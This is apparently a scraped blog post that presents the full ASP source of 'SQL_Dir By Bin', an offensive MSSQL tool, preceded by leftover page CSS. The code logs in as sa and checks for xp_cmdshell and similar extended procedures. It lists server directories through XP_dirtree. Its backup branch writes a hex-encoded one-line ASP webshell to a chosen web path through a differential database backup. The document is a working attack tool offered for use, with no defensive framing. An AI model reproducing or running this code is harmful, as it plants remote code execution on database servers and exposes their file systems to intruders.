FONT-FAMILY: &#8220;Courier New&#8221;;
scrollbar-face-color:#E4E4F3;
scrollbar-highlight-color:#FFFFFF;
scrollbar-3dlight-color:#E4E4F3;
scrollbar-darkshadow-color:#9C9CD3;
scrollbar-shadow-color:#E4E4F3;
scrollbar-arrow-color:#4444B3;
scrollbar-track-color:#EFEFEF;
}
TABLE {
FONT-SIZE: 9pt;
FONT-FAMILY: &#8220;Courier New&#8221;;
BORDER-COLLAPSE: collapse;
border-width: 1px;
border-top-style: solid;
border-right-style: none;
border-bottom-style: none;
border-left-style: solid;
border-color: #d8d8f0;
}
.tr {
font-family: &#8220;Courier New&#8221;;
font-size: 9pt;
background-color: #e4e4f3;
text-align: center;
}
.td {
height: 24px;
font-size: 9pt;
background-color: #f9f9fd;
font-family: &#8220;Courier New&#8221;;
}
input {
font-family: &#8220;Courier New&#8221;;
BORDER-TOP-WIDTH: 1px;
BORDER-LEFT-WIDTH: 1px;
FONT-SIZE: 12px;
BORDER-BOTTOM-WIDTH: 1px;
BORDER-RIGHT-WIDTH: 1px;
color: #000000;
}
textarea {
font-family: &#8220;Courier New&#8221;;
BORDER-WIDTH: 1px;
FONT-SIZE: 12px;
color: #000000;
}
A:visited {
FONT-SIZE: 9pt;
COLOR: #333333;
FONT-FAMILY: &#8220;Courier New&#8221;;
TEXT-DECORATION: none;
}
A:active {
FONT-SIZE: [...]]]></description>
			<content:encoded><![CDATA[<p>asp操作mssql数据库的源码:</p>
<p>&lt;title&gt;SQL_Dir By Bin&lt;/title&gt;<br />
&lt;style id=theStyle&gt;<br />
BODY {<br />
FONT-SIZE: 9pt;<br />
COLOR: #000000;<br />
background-color: #ffffff;<span id="more-1156"></span><br />
FONT-FAMILY: &#8220;Courier New&#8221;;<br />
scrollbar-face-color:#E4E4F3;<br />
scrollbar-highlight-color:#FFFFFF;<br />
scrollbar-3dlight-color:#E4E4F3;<br />
scrollbar-darkshadow-color:#9C9CD3;<br />
scrollbar-shadow-color:#E4E4F3;<br />
scrollbar-arrow-color:#4444B3;<br />
scrollbar-track-color:#EFEFEF;<br />
}<br />
TABLE {<br />
FONT-SIZE: 9pt;<br />
FONT-FAMILY: &#8220;Courier New&#8221;;<br />
BORDER-COLLAPSE: collapse;<br />
border-width: 1px;<br />
border-top-style: solid;<br />
border-right-style: none;<br />
border-bottom-style: none;<br />
border-left-style: solid;<br />
border-color: #d8d8f0;<br />
}<br />
.tr {<br />
font-family: &#8220;Courier New&#8221;;<br />
font-size: 9pt;<br />
background-color: #e4e4f3;<br />
text-align: center;<br />
}<br />
.td {<br />
height: 24px;<br />
font-size: 9pt;<br />
background-color: #f9f9fd;<br />
font-family: &#8220;Courier New&#8221;;<br />
}<br />
input {<br />
font-family: &#8220;Courier New&#8221;;<br />
BORDER-TOP-WIDTH: 1px;<br />
BORDER-LEFT-WIDTH: 1px;<br />
FONT-SIZE: 12px;<br />
BORDER-BOTTOM-WIDTH: 1px;<br />
BORDER-RIGHT-WIDTH: 1px;<br />
color: #000000;<br />
}<br />
textarea {<br />
font-family: &#8220;Courier New&#8221;;<br />
BORDER-WIDTH: 1px;<br />
FONT-SIZE: 12px;<br />
color: #000000;<br />
}<br />
A:visited {<br />
FONT-SIZE: 9pt;<br />
COLOR: #333333;<br />
FONT-FAMILY: &#8220;Courier New&#8221;;<br />
TEXT-DECORATION: none;<br />
}<br />
A:active {<br />
FONT-SIZE: 9pt;<br />
COLOR: #3366cc;<br />
FONT-FAMILY: &#8220;Courier New&#8221;;<br />
TEXT-DECORATION: none;<br />
}<br />
A:link {<br />
FONT-SIZE: 9pt;<br />
COLOR: #000000;<br />
FONT-FAMILY: &#8220;Courier New&#8221;;<br />
TEXT-DECORATION: none;<br />
}<br />
A:hover {<br />
FONT-SIZE: 9pt;<br />
COLOR: #3366cc;<br />
FONT-FAMILY: &#8220;Courier New&#8221;;<br />
TEXT-DECORATION: none;<br />
}<br />
tr {<br />
font-family: &#8220;Courier New&#8221;;<br />
font-size: 9pt;<br />
line-height: 18px;<br />
}<br />
td {<br />
font-size: 9pt;<br />
font-family: &#8220;Courier New&#8221;;<br />
border-width: 1px;<br />
border-top-style: none;<br />
border-right-style: solid;<br />
border-bottom-style: solid;<br />
border-left-style: none;<br />
border-color: #d8d8f0;<br />
}<br />
.trHead {<br />
font-family: &#8220;Courier New&#8221;;<br />
height: 2px;<br />
background-color: #e4e4f3;<br />
line-height: 2px;<br />
}</p>
<p>.fixSpan {<br />
overflow: hidden;<br />
white-space: nowrap;<br />
text-overflow: ellipsis;<br />
vertical-align: baseline;<br />
}</p>
<p>.fixTable {<br />
word-break: break-all;<br />
word-wrap: break-word;<br />
}</p>
<p>#fileList span{<br />
width: 120px;<br />
line-height: 23px;<br />
cursor: hand;<br />
overflow: hidden;<br />
padding-left: 5px;<br />
white-space: nowrap;<br />
text-overflow: ellipsis;<br />
vertical-align: baseline;<br />
border: 1px solid #ffffff;<br />
}<br />
&lt;/style&gt;<br />
&lt;%if session(&#8220;login&#8221;)=&#8221;" then%&gt;<br />
&lt;%<br />
Echo &#8220;&lt;body onload=document.formx.pass.focus();&gt;&#8221;<br />
Echo &#8220;&lt;table width=816 align=center&gt;&#8221;<br />
Echo &#8220;&lt;form method=post name=formx action=&#8217;?action=login&#8217;&gt;&#8221;<br />
Echo &#8220;&lt;tr&gt;&#8221;<br />
Echo &#8220;&lt;td align=center class=td&gt;数 据 库 连 接&lt;/td&gt;&#8221;<br />
Echo &#8220;&lt;/tr&gt;&#8221;<br />
Echo &#8220;&lt;tr&gt;&#8221;<br />
Echo &#8220;&lt;td height=75 align=center&gt;&#8221;<br />
Echo &#8220;IP：&lt;input name=ip type=text style=&#8217;border:1px solid #d8d8f0;background-color:#ffffff;&#8217; value=localhost&gt; &#8221;<br />
Echo &#8220;PORT：&lt;input name=port type=text style=&#8217;border:1px solid #d8d8f0;background-color:#ffffff;&#8217; value=1433&gt; &#8221;<br />
Echo &#8220;USER：&lt;input name=user type=text style=&#8217;border:1px solid #d8d8f0;background-color:#ffffff;&#8217; value=sa&gt; &#8221;<br />
Echo &#8220;PASS：&lt;input name=pass type=text style=&#8217;border:1px solid #d8d8f0;background-color:#ffffff;&#8217;&gt; &#8221;<br />
Echo &#8220;&lt;/td&gt;&#8221;<br />
Echo &#8220;&lt;/tr&gt;&#8221;<br />
Echo &#8220;&lt;tr&gt;&#8221;<br />
Echo &#8220;&lt;td align=center class=td&gt;&lt;input type=submit value=LOGIN style=&#8217;border:1px solid #d8d8f0;background-color:#f9f9fd;&#8217;&gt;&lt;/td&gt;&#8221;<br />
Echo &#8220;&lt;/tr&gt;&#8221;<br />
Echo &#8220;&lt;tr&gt;&#8221;<br />
Echo &#8220;&lt;td align=center class=td&gt;2007 @ SQL_DIR By Bin &lt;br&gt;&lt;a href= <a rel="external" href="http://www.rootkit.net.cn/" target="_blank">http://www.rootkit.net.cn</a> target=_blank&gt;www.rootkit.net.cn&lt;/a&gt;&lt;/td&gt;&#8221;<br />
Echo &#8220;&lt;/tr&gt;&#8221;<br />
Echo &#8220;&lt;/form&gt;&#8221;<br />
Echo &#8220;&lt;/table&gt;&#8221;<br />
Echo &#8220;&lt;/body&gt;&#8221;</p>
<p>%&gt;</p>
<p>&lt;%End If %&gt;<br />
&lt;%<br />
If request(&#8220;action&#8221;)=&#8221;login&#8221; Then<br />
SqlLocalName =&#8221;"&amp;request.Form(&#8220;ip&#8221;)&amp;&#8221;,&#8221;&amp;request.Form(&#8220;port&#8221;)&amp;&#8221;" &#8216;连接IP [ 本地用 (local) 外地用IP ]<br />
SqlUserName =&#8221;"&amp;request.Form(&#8220;user&#8221;)&amp;&#8221;" &#8216;用户名<br />
SqlPassword =&#8221;"&amp;request.Form(&#8220;pass&#8221;)&amp;&#8221;" &#8216;用户密码<br />
&#8216;SqlDatabaseName=&#8221;sql&#8221; &#8216;数据库名<br />
ConnStr = &#8220;Provider=Sqloledb;User ID=&#8221; &amp; SqlUserName &amp; &#8220;; Password=&#8221; &amp; SqlPassword &amp; &#8220;; Initial CataLog = &#8221; &amp; SqlDatabaseName &amp; &#8220;; Data Source=&#8221; &amp; SqlLocalName &amp; &#8220;;&#8221;<br />
SqlNowString=&#8221;GetDate()&#8221;<br />
On Error Resume Next &#8216; 容错<br />
Set Conn=Server.CreateObject(&#8220;ADODB.Connection&#8221;)<br />
Conn.open ConnStr<br />
If Err.number=-2147467259 Then<br />
Echo &#8220;&lt;script language=&#8217;javascript&#8217;&gt; alert(&#8216;主机IP或者端口连接错误，请检查!&#8217;);history.back(); &lt;/script&gt;&#8221;<br />
ElseIf Err.number=-2147217843 Then<br />
Echo &#8220;&lt;script language=&#8217;javascript&#8217;&gt; alert(&#8216;用户名或者密码错误，请检查!&#8217;);history.back(); &lt;/script&gt;&#8221;<br />
End If<br />
If Err.number=0 Then<br />
session(&#8220;login&#8221;)=&#8221;yes&#8221;<br />
session(&#8220;user&#8221;)=request.Form(&#8220;user&#8221;)<br />
session(&#8220;pass&#8221;)=request.Form(&#8220;pass&#8221;)<br />
session(&#8220;ip&#8221;)=request.Form(&#8220;ip&#8221;)<br />
session(&#8220;port&#8221;)=request.Form(&#8220;port&#8221;)<br />
End If<br />
response.redirect&#8221;?action=tools&#8221;<br />
End If<br />
%&gt;</p>
<p>&lt;%</p>
<p>If request(&#8220;action&#8221;)=&#8221;tools&#8221; or request(&#8220;action&#8221;)=&#8221;" Then</p>
<p>If session(&#8220;login&#8221;)=&#8221;yes&#8221; Then<br />
%&gt;<br />
&lt;%<br />
rem&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-数据库连接&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
ConnStr = &#8220;Provider=Sqloledb.1;User ID=&#8221; &amp;session(&#8220;user&#8221;)&amp; &#8220;; Password=&#8221; &amp;session(&#8220;pass&#8221;)&amp; &#8220;; Initial CataLog = &#8221; &amp; SqlDatabaseName &amp; &#8220;; Data Source=&#8221; &amp; session(&#8220;ip&#8221;) &amp; &#8220;,&#8221;&amp;session(&#8220;port&#8221;)&amp;&#8221;;&#8221;<br />
Set Conn=Server.CreateObject(&#8220;ADODB.Connection&#8221;)<br />
Conn.open ConnStr<br />
Set Cat = Server.CreateObject(&#8220;ADOX.Catalog&#8221;)<br />
Cat.ActiveConnection = conn.ConnectionString<br />
rem&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;函数&#8212;&#8212;&#8212;&#8212;-<br />
Sub Echo(sStr)<br />
Response.Write sStr<br />
End Sub</p>
<p>Function IIf(var, val1, val2)<br />
If var = True Then IIf = val1 Else IIf = val2<br />
End Function<br />
const copyright = &#8220;Code By Bin&lt;br&gt;&lt;a href = <a rel="external" href="http://www.rootkit.net.cn/" target="_blank">http://www.rootkit.net.cn</a> target=_blank&gt;www.rootkit.net.cn&lt;/a&gt;&#8221;<br />
RootPath = Server.MapPath(&#8220;/&#8221;)<br />
Path=Request.ServerVariables(&#8220;PATH_TRANSLATED&#8221;)<br />
Server_Name=Request.ServerVariables(&#8220;SERVER_NAME&#8221;)<br />
IP=Request.ServerVariables(&#8220;LOCAL_ADDR&#8221;)<br />
PORT=Request.ServerVariables(&#8220;SERVER_PORT&#8221;)<br />
OS= Request.ServerVariables(&#8220;OS&#8221;)<br />
OS= IIf(OS = &#8220;&#8221;, &#8220;<a class="wordstyle" href="http://www.hack58.net/" target="_blank">Windows</a>2003&#8243;, OS) &amp; &#8220;, &#8221; &amp; Request.ServerVariables(&#8220;SERVER_SOFTWARE&#8221;)<br />
OS= OS &amp; &#8220;, &#8221; &amp; ScriptEngine &amp; &#8220;/&#8221; &amp; ScriptEngineMajorVersion &amp; &#8220;.&#8221; &amp;ScriptEngineMinorVersion &amp; &#8220;.&#8221; &amp; ScriptEngineBuildVersion<br />
Curl=Request.ServerVariables(&#8220;SCRIPT_NAME&#8221;)<br />
RequestUrl=Request.ServerVariables(&#8220;Url&#8221;)<br />
URL=&#8221;<a rel="external" href="http:///" target="_blank">http://</a>&#8220;&amp;Server_Name&amp;Requesturl</p>
<p>rem&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>rem&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;数据库操作&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
Set rs = conn.execute(&#8220;select @@version&#8221;)<br />
SQLversion=rs(0)<br />
Set rs = Conn.execute(&#8220;select db_name(0)&#8221;)<br />
DBname=rs(0)<br />
Set rs = Conn.execute(&#8220;select user&#8221;)<br />
DBuser=rs(0)<br />
&#8216;权限判断<br />
Set rs = Conn.execute(&#8220;Select IS_SRVROLEMEMBER(&#8217;sysadmin&#8217;)&#8221;)<br />
If rs(0)=1 Then<br />
dbo=&#8221;sa&#8221;<br />
End If<br />
Set rs = Conn.execute(&#8220;Select IS_MEMBER(&#8216;db_owner&#8217;)&#8221;)<br />
If rs(0)=1 Then<br />
dbo=&#8221;db_owner&#8221;<br />
Else<br />
dbo=&#8221;public&#8221;<br />
End If<br />
&#8216;扩展判断<br />
Set rs = Conn.execute(&#8220;select count(*) from master.dbo.sysobjects where xtype=&#8217;X&#8217; and name=&#8217;xp_cmdshell&#8217;&#8221;)<br />
If rs(0)=1 Then<br />
xp_cmdshell=&#8221;XP_cmdshell √&#8221;<br />
Else<br />
xp_cmdshell=&#8221;XP_cmdshell ×&#8221;<br />
End If<br />
Set rs = Conn.execute(&#8220;select count(*) from master.dbo.sysobjects where xtype=&#8217;X&#8217; and name=&#8217;sp_oacreate&#8217;&#8221;)<br />
If rs(0)=1 Then<br />
sp_oacreate=&#8221;SP_oacreate √&#8221;<br />
Else<br />
sp_oacreate=&#8221;SP_oacreate ×&#8221;<br />
End If<br />
Set rs = Conn.execute(&#8220;select count(*) from master.dbo.sysobjects where xtype=&#8217;X&#8217; and name=&#8217;xp_regwrite&#8217;&#8221;)<br />
If rs(0)=1 Then<br />
xp_regwrite=&#8221;XP_regwrite √&#8221;<br />
Else<br />
xp_regwrite=&#8221;XP_regwrite ×&#8221;<br />
End If<br />
Set rs = Conn.execute(&#8220;select count(*) from master.dbo.sysobjects where xtype=&#8217;X&#8217; and name=&#8217;xp_servicecontrol&#8217;&#8221;)<br />
If rs(0)=1 Then<br />
xp_servicecontrol=&#8221;XP_servicecontrol √&#8221;<br />
Else<br />
xp_servicecontrol=&#8221;XP_servicecontrol ×&#8221;<br />
End If<br />
Set rs = Conn.execute(&#8220;select count(*) from master.dbo.sysobjects where xtype=&#8217;X&#8217; and name=&#8217;xp_regread&#8217;&#8221;)<br />
If rs(0)=1 Then<br />
xp_regread=&#8221;XP_regread √&#8221;<br />
Else<br />
xp_regread=&#8221;XP_regread ×&#8221;<br />
End If<br />
Set rs = Conn.execute(&#8220;select count(*) from master.dbo.sysobjects where xtype=&#8217;X&#8217; and name=&#8217;sp_oamethod&#8217;&#8221;)<br />
If rs(0)=1 Then<br />
sp_oamethod=&#8221;SP_oamethod √&#8221;<br />
Else<br />
sp_oamethod=&#8221;SP_oamethod ×&#8221;<br />
End If<br />
Set rs = Conn.execute(&#8220;select count(*) from master.dbo.sysobjects where xtype=&#8217;X&#8217; and name=&#8217;XP_dirtree&#8217;&#8221;)<br />
If rs(0)=1 Then<br />
XP_dirtree=&#8221;XP_dirtree √&#8221;<br />
Else<br />
XP_dirtree=&#8221;XP_dirtree × (貌似不能使用该程序)&#8221;<br />
End If<br />
rem&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;操作检测&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
On Error Resume Next<br />
Set Rs = Conn.Execute(&#8220;USE pubs&#8221;)<br />
If Err Then<br />
cbase=&#8221;无法切换到PUBS数据库！&#8221;<br />
Else<br />
cbase=&#8221;切换到PUBS数据库！&#8221;<br />
End If<br />
Set rs = Conn.execute(&#8220;drop table [bin_dir]&#8220;)<br />
If Err Then<br />
drop=&#8221;删除表失败！&#8221;<br />
Else<br />
drop=&#8221;删除表成功！&#8221;<br />
End If<br />
Set rs = Conn.execute(&#8220;Create TABLE bin_dir(DirName VARCHAR(400), DirAtt VARCHAR(400),DirFile VARCHAR(400)) Insert bin_dir EXEC MASTER..XP_dirtree &#8216;c:&#8217;,1,1&#8243;)<br />
If Err Then<br />
create=&#8221;建表失败！&#8221;<br />
Else<br />
create=&#8221;建表成功！&#8221;<br />
End If<br />
Set rs = Conn.execute(&#8220;select conunt(*) from bin_dir&#8221;)<br />
If rs(0)&gt;1 Then<br />
xp=&#8221;扩展执行成功！　&lt;FONT COLOR=RED&gt;&lt;STRONG&gt;GOOD LUCK！&lt;/STRONG&gt;&lt;/FONT&gt;&#8221;<br />
Else<br />
xp=&#8221;扩展执行失败！　SOORY!&#8221;<br />
End If<br />
rem&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
Sub SQLdbname()<br />
l=100<br />
For i=1 To l<br />
a=a+1<br />
Set rs = conn.execute(&#8220;select db_name(&#8220;&amp;a&amp;&#8221;)&#8221;)<br />
If rs(0)&lt;&gt;&#8221;" then<br />
Echo &#8220;&#8221;&amp;rs(0)&amp;&#8221; &#8221;<br />
Else<br />
Exit For<br />
End If<br />
Next<br />
End Sub<br />
rem&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;数据显示&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
Sub showdata()<br />
set rs2=server.CreateObject(&#8220;adodb.recordset&#8221;)<br />
rs2.open &#8220;select * from bin_dir order by dirfile&#8221;,conn,1,1</p>
<p>Echo &#8220;&lt;tr&gt;&#8221;<br />
For j = 0 To rs2.Fields.Count &#8211; 1<br />
Echo &#8220;&lt;td height=22 class=td width=500&gt;&lt;span class=fixSpan title=&#8217;&#8221; &amp; rs2.Fields(j).Name &amp; &#8220;&#8216; style=&#8217;width:125px;padding-left:5px;&#8217;&gt;&#8221; &amp; rs2.Fields(j).Name &amp; &#8220;&lt;/span&gt;&lt;/td&gt;&#8221;<br />
Next<br />
Echo &#8220;&lt;/tr&gt;&#8221;<br />
Echo &#8220;&lt;tr&gt;&#8221;<br />
For i = 0 To rs2.recordcount<br />
For j = 0 To rs2.Fields.Count &#8211; 1<br />
Echo &#8220;&lt;td height=22 class=td width=500&gt;&lt;span class=fixSpan style=&#8217;width:250px;padding-left:5px;&#8217;&gt;&lt;a href=&#8217;?action=dir&amp;path=&#8221;&amp;dir_path&amp;&#8221;"&amp;rs2(j)&amp;&#8221;&#8216;&gt;&#8221; &amp;rs2(j)&amp; &#8220;&lt;/a&gt;&lt;/span&gt;&lt;/td&gt;&#8221;<br />
Next<br />
Echo &#8220;&lt;tr&gt;&#8221;<br />
RS2.MoveNext<br />
Next<br />
End Sub<br />
rem&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
rem&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;删除表&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
Sub droptable()<br />
Set rs = Conn.execute(&#8220;drop table [bin_dir]&#8220;)<br />
End Sub<br />
rem&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>Echo &#8220;&lt;table style=&#8217;TABLE-LAYOUT: fixed; WORD-BREAK: break-all&#8217;&gt;&#8221;<br />
Echo &#8220;&lt;tr&gt;&#8221;<br />
Echo&#8221;&lt;td width=20% valign=top&gt;&#8221;<br />
For Each objTable In Cat.Tables<br />
Echo &#8220;&lt;span class=fixSpan title=&#8217;&#8221; &amp; objTable.Name &amp; &#8220;&#8216; &#8221;<br />
Echo &#8220;style=&#8217;width:90%;padding-left:8px;cursor:hand;&#8217;&gt;&#8221; &amp; objTable.Name &amp; &#8220;&lt;/span&gt;&#8221;<br />
Next<br />
Echo &#8220;&lt;/td&gt;&#8221;<br />
Echo &#8220;&lt;td valign=top&gt;&#8221;<br />
Echo &#8220;&lt;table&gt;&#8221;<br />
Echo &#8220;&lt;tr class=td&gt;&#8221;<br />
Echo &#8220;&lt;td width=&#8217;100&#8242;&gt; 项目&lt;/td&gt;&#8221;<br />
Echo &#8220;&lt;td width=&#8217;400&#8242;&gt; 值&lt;/td&gt;&#8221;<br />
Echo &#8220;&lt;/tr&gt;&#8221;<br />
Echo &#8220;&lt;tr class=td&gt;&#8221;<br />
Echo &#8220;&lt;td&gt; 当前时间&lt;/td&gt;&#8221;<br />
Echo &#8220;&lt;td&gt; &#8220;&amp;FormatDateTime(Now(), 0)&amp;&#8221;&lt;/td&gt;&#8221;<br />
Echo &#8220;&lt;/tr&gt;&#8221;<br />
Echo &#8220;&lt;tr class=td&gt;&#8221;<br />
Echo &#8220;&lt;td&gt; 服务器地址&lt;/td&gt;&#8221;<br />
Echo &#8220;&lt;td&gt; 名称: &#8220;&amp;SERVER_NAME&amp;&#8221;(IP:&#8221;&amp;IP&amp;&#8221;) 端口:&#8221;&amp;PORT&amp;&#8221;&lt;/td&gt;&#8221;<br />
Echo &#8220;&lt;/tr&gt;&#8221;<br />
Echo &#8220;&lt;tr class=td&gt;&#8221;<br />
Echo &#8220;&lt;td&gt; 软件环境&lt;/td&gt;&#8221;<br />
Echo &#8220;&lt;td&gt; &#8220;&amp;OS&amp;&#8221;&lt;/td&gt;&#8221;<br />
Echo &#8220;&lt;/tr&gt;&#8221;<br />
Echo &#8220;&lt;tr class=td&gt;&#8221;<br />
Echo &#8220;&lt;td&gt; 站点目录&lt;/td&gt;&#8221;<br />
Echo &#8220;&lt;td&gt; &#8220;&amp;rootpath&amp;&#8221;&lt;/td&gt;&#8221;<br />
Echo &#8220;&lt;/tr&gt;&#8221;<br />
Echo &#8220;&lt;tr class=td&gt;&#8221;<br />
Echo &#8220;&lt;td&gt; 当前路径&lt;/td&gt;&#8221;<br />
Echo &#8220;&lt;td&gt; Path: &#8221; &amp;path&amp; &#8220;&lt;br /&gt; URL : &#8220;&amp;URL&amp;&#8221;&lt;/td&gt;&#8221;<br />
Echo &#8220;&lt;/tr&gt;&#8221;<br />
Echo &#8220;&lt;tr class=td&gt;&#8221;<br />
Echo &#8220;&lt;td&gt; SQL版本&lt;/td&gt;&#8221;<br />
Echo &#8220;&lt;td&gt; &#8220;&amp;sqlversion&amp;&#8221;&lt;/td&gt;&#8221;<br />
Echo &#8220;&lt;/tr&gt;&#8221;<br />
Echo &#8220;&lt;tr class=td&gt;&#8221;<br />
Echo &#8220;&lt;td&gt; SQL所有库&lt;/td&gt;&#8221;<br />
Echo &#8220;&lt;td&gt; &#8221;<br />
sqldbname()<br />
Echo &#8220;&lt;/td&gt;&#8221;<br />
Echo &#8220;&lt;/tr&gt;&#8221;<br />
Echo &#8220;&lt;tr class=td&gt;&#8221;<br />
Echo &#8220;&lt;td&gt; 当前库检测&lt;/td&gt;&#8221;<br />
Echo &#8220;&lt;td&gt; 用户名:&#8221;&amp;dbname&amp;&#8221; 数据库:&#8221;&amp;dbuser&amp;&#8221; 权限:&#8221;&amp;dbo&amp;&#8221;&lt;/td&gt;&#8221;<br />
Echo &#8220;&lt;/tr&gt;&#8221;<br />
Echo &#8220;&lt;tr class=td&gt;&#8221;<br />
Echo &#8220;&lt;td&gt; 扩展检测&lt;/td&gt;&#8221;<br />
Echo &#8220;&lt;td&gt; &#8220;&amp;xp_cmdshell&amp;&#8221; &#8220;&amp;sp_oacreate&amp;&#8221; &#8220;&amp;xp_regwrite&amp;&#8221; &#8220;&amp;xp_servicecontrol&amp;&#8221; &#8220;&amp;sp_oamethod&amp;&#8221;&lt;br&gt; &#8220;&amp;xp_regread&amp;&#8221; &#8220;&amp;XP_dirtree&amp;&#8221;&lt;/td&gt;&#8221;<br />
Echo &#8220;&lt;/tr&gt;&#8221;<br />
Echo &#8220;&lt;tr class=td&gt;&#8221;<br />
Echo &#8220;&lt;td&gt; 操作检测&lt;/td&gt;&#8221;<br />
Echo &#8220;&lt;td&gt; &#8220;&amp;cbase&amp;&#8221; &#8220;&amp;create&amp;&#8221; &#8220;&amp;drop&amp;&#8221; &#8220;&amp;xp&amp;&#8221;&lt;/td&gt;&#8221;<br />
Echo &#8220;&lt;/tr&gt;&#8221;<br />
Echo &#8220;&lt;/table&gt;&#8221;<br />
Echo &#8220;&lt;table&gt;&#8221;<br />
Echo &#8220;&lt;tr class=td&gt;&#8221;<br />
Echo &#8220;&lt;td width=&#8217;115&#8242;&gt; 列目录&lt;/td&gt;&#8221;<br />
Echo &#8220;&lt;form method=post name=form2 action=&#8217;?action=dir&#8217;&gt;&#8221;<br />
Echo &#8220;&lt;td width=&#8217;700&#8242;&gt; &lt;INPUT TYPE=text NAME=path size=70 value=&#8217;c:&#8217;&gt; &lt;INPUT TYPE=submit value=查询&gt;&lt;/from&gt;&lt;/td&gt;&#8221;<br />
Echo &#8220;&lt;/form&gt;&#8221;<br />
Echo &#8220;&lt;/tr&gt;&#8221;<br />
Echo &#8220;&lt;/table&gt;&#8221;<br />
Echo &#8220;&lt;/td&gt;&#8221;<br />
Echo &#8220;&lt;/tr&gt;&#8221;<br />
Echo &#8220;&lt;/table&gt;&#8221;<br />
Echo &#8220;&lt;p&gt;&#8221;<br />
Echo &#8220;&lt;center&gt;&#8221;?right&amp;&#8221;&lt;/center&gt;&#8221;<br />
End If<br />
End If &#8216;tools功能结束%&gt;</p>
<p>&lt;%<br />
If request(&#8220;action&#8221;)=&#8221;dir&#8221; Then<br />
If session(&#8220;login&#8221;)=&#8221;yes&#8221; Then</p>
<p>On Error Resume Next<br />
rem&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-数据库连接&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
ConnStr = &#8220;Provider=Sqloledb.1;User ID=&#8221; &amp;session(&#8220;user&#8221;)&amp; &#8220;; Password=&#8221; &amp;session(&#8220;pass&#8221;)&amp; &#8220;; Initial CataLog = &#8221; &amp; SqlDatabaseName &amp; &#8220;; Data Source=&#8221; &amp; session(&#8220;ip&#8221;) &amp; &#8220;,&#8221;&amp;session(&#8220;port&#8221;)&amp;&#8221;;&#8221;<br />
Set Conn=Server.CreateObject(&#8220;ADODB.Connection&#8221;)<br />
Conn.open ConnStr<br />
Set Cat = Server.CreateObject(&#8220;ADOX.Catalog&#8221;)<br />
Cat.ActiveConnection = conn.ConnectionString<br />
rem&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;函数&#8212;&#8212;&#8212;&#8212;-<br />
rem&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;操作检测&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-</p>
<p>On Error Resume Next<br />
bak_path=Replace(Request(&#8220;bak&#8221;),&#8221;\&#8221;,&#8221;")<br />
dir_path=Replace(Request(&#8220;path&#8221;),&#8221;\&#8221;,&#8221;")<br />
If bak_path&lt;&gt;&#8221;" Then<br />
dir_path=Replace(bak_path,&#8221;bin.asp&#8221;,&#8221;")<br />
Set Rs = Conn.Execute(&#8220;create table [bin_cmd] ([cmd] [image])&#8221;)<br />
Set Rs = Conn.Execute(&#8220;declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0X620069006E00 backup database @a to disk = @s;&#8221;)<br />
Set Rs = Conn.Execute(&#8220;insert into [bin_cmd](cmd) values(0&#215;3C25657865637574652872657175657374282242222929253E);declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=&#8217;&#8221;&amp;bak_path&amp;&#8221;&#8216; backup database @a to disk = @s WITH DIFFERENTIAL,FORMAT&#8221;)<br />
Set Rs = Conn.Execute(&#8220;drop table [bin_cmd]&#8220;)<br />
end if<br />
Set Rs = Conn.Execute(&#8220;USE pubs&#8221;)<br />
If Err Then<br />
cbase=&#8221;无法切换到PUBS数据库！&#8221;<br />
Else<br />
cbase=&#8221;切换到PUBS数据库！&#8221;<br />
End If<br />
Set rs = Conn.execute(&#8220;drop table [bin_dir]&#8220;)<br />
If Err Then<br />
drop=&#8221;删除表失败！&#8221;<br />
Else<br />
drop=&#8221;删除表成功！&#8221;<br />
End If<br />
Set rs = Conn.execute(&#8220;Create TABLE bin_dir(DirName VARCHAR(400), DirAtt VARCHAR(400),DirFile VARCHAR(400)) Insert bin_dir EXEC MASTER..XP_dirtree &#8216;&#8221;&amp;dir_path&amp;&#8221;&#8216;,1,1&#8243;)<br />
If Err Then<br />
create=&#8221;建表失败！&#8221;<br />
Else<br />
create=&#8221;建表成功！&#8221;<br />
End If<br />
Set rs = Conn.execute(&#8220;select conunt(*) from bin_dir&#8221;)<br />
If rs(0)&gt;1 Then<br />
xp=&#8221;扩展执行成功！　&lt;FONT COLOR=RED&gt;&lt;STRONG&gt;GOOD LUCK！&lt;/STRONG&gt;&lt;/FONT&gt;&#8221;<br />
Else<br />
xp=&#8221;扩展执行失败！　SOORY!&#8221;<br />
End If<br />
rem&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
Echo &#8220;&lt;table style=&#8217;TABLE-LAYOUT: fixed; WORD-BREAK: break-all&#8217;&gt;&#8221;<br />
Echo &#8220;&lt;tr&gt;&#8221;<br />
Echo&#8221;&lt;td width=20% valign=top&gt;&#8221;<br />
